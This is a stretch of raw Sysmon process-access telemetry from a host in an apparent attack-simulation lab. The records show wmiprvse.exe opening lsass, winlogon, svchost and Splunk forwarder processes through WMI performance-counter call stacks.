21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-0E00-00000000D101}880C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150981Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0D00-00000000D101}788C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150980Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0D00-00000000D101}788C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150979Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0C00-00000000D101}720C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150978Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0C00-00000000D101}720C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150977Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0B00-00000000D101}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150976Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0B00-00000000D101}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150975Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0900-00000000D101}564C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150974Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0900-00000000D101}564C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150973Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.501{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-481E-60CA-2D08-00000000D101}5140C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150972Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.501{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-481E-60CA-2D08-00000000D101}5140C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150971Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.501{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-4818-60CA-2408-00000000D101}4064C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150970Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.501{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-4818-60CA-2408-00000000D101}4064C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150969Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.501{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-480E-60CA-FA07-00000000D101}7132C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150968Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.501{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-480E-60CA-FA07-00000000D101}7132C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150967Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.501{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150966Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.501{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program 